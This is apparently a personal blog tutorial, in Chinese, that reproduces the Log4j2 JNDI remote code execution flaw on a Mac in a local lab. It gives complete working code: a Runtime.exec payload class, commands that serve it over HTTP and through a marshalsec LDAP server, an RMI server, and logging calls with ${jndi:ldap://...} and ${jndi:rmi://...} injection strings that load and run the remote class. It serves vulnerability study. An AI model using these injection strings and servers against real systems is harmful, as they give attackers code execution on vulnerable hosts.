Log4j2高危漏洞复现流程

背景

 Apache Log4j2是一个基于Java的日志记录工具，该工具重写了Log4j框架，并且引入了大量丰富的特性，Apache log4j-2是Log4j的升级版，这个日志框架被大量用于业务系统开发，用来记录日志信息。在大多数情况下，开发者可能会将用户输入导致的错误信息写入日志中，而攻击者则可以利用此特性通过该漏洞构造特殊的数据请求包，最终触发远程代码执行。
 本文章主要是处于个人兴趣想去复现一下 Log4j2的漏洞，事先声明本人对安全领域一窍不通，只是之前碰巧读过部分 Log4j 的代码，所以有兴趣研究下这个问题的根源，当然这篇文章只是告诉大家怎么去复现这个问题。关于 Log4j2部分的源码得等下篇文章了。

环境介绍

• 操作系统：macOS Catalina
• java version "1.8.0_191"
• LDAP服务端
• python3.x
• 手写 RMI 服务端以及测试代码。

LDAP 方式复现

• 1.手写hack 代码用于启动mac 系统的计算器 java 代码，编译成class 文件。
• 2.在 class 目录通过 python3 -m http.server 启动服务后能够通过 http 协议访到 hack 的 class 文件。
• 3.通过marshalsec启动一个 LDAP 服务器，代码开源可以手动各种操作，编译成 jar 包参考LDAP服务端。
• 4.通过 log4j2的打印日志然后访问 hack 代码启动本地计算器。

public class BugFinder {

    public BugFinder() {
        try {
            System.out.println("执行漏洞代码");
            String[] commands = {"open", "/System/Applications/Calculator.app"};
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
            System.out.println("完成执行漏洞代码");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
        BugFinder bugFinder = new BugFinder();
    }
}

• hack 的代码负责启动mac系统的计算器。

python3 -m http.server 8000

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8000/#BugFinder"

• 在 hack 的class文件所在目录通 python3启动http服务暴露 hack 的 class 文件。
• 通过marshalsec的开源软件启动 LDAP 服务，参考LDAP服务端。

package com.bug;

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;


public class BugTester {

    private static final Logger logger = LogManager.getLogger(BugTester.class);

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:ldap://192.168.0.3:1389/BugFinder}");
        try {
            Thread.sleep(1000);
        } catch (Exception e) {

        }
    }
}

• 通过 log4j2的打印日志${jndi:ldap://192.168.0.3:1389/BugFinder}唤起本地计算器。
• 不同的 JDK 对于com.sun.jndi.ldap.object.trustURLCodebase的默认值不一样，所以为了测试统一设置成true 便于触发。
• 不同的 JDK 版本的默认值可能导致这个 bug 不会被触发。

RMI 方式复现

• 1.手写hack 代码用于启动mac 系统的计算器 java 代码，编译成class 文件。
• 2.手写 RMI 的服务端代码。
• 3.通过 log4j2的打印日志然后访问 hack 代码启动本地计算器。

package com.bug;

public class BugFinder {

    public BugFinder() {
        try {
            System.out.println("执行漏洞代码");
            String[] commands = {"open", "/System/Applications/Calculator.app"};
            Process pc = Runtime.getRuntime().exec(commands);
            pc.waitFor();
            System.out.println("完成执行漏洞代码");
        } catch (Exception e) {
            e.printStackTrace();
        }
    }

    public static void main(String[] args) {
        BugFinder bugFinder = new BugFinder();
    }
}

• hack 的代码负责启动mac系统的计算器。

package com.bug;

import com.sun.jndi.rmi.registry.ReferenceWrapper;
import javax.naming.Reference;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;

public class RMIServer {

    public static void main(String[] args) {
        try {
            LocateRegistry.createRegistry(1099);
            Registry registry = LocateRegistry.getRegistry();
            Reference reference = new Reference("com.bug.BugFinder",
                    "com.bug.BugFinder", null);
            ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);

            registry.bind("BugFinder", referenceWrapper);

        } catch (Exception e) {
            e.printStackTrace();
        }
    }
}

• RMI 的服务端代码，启动1099端口进行监听。对应 log4j2的日志通过"jndi:rmi://192.168.0.3:1099/BugFinder"进行访问呢。
• Reference的参数com.bug.BugFinder就是 hack 代码的class 路径。

public class BugTester {

    private static final Logger logger = LogManager.getLogger(BugTester.class);

    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:rmi://192.168.0.3:1099/BugFinder}");

        try {
            Thread.sleep(1000);
        } catch (Exception e) {
        }
    }
}

• 执行 log4j2的 error 日志，参数为${jndi:rmi://192.168.0.3:1099/BugFinder}，会触发mac 系统打开计算器。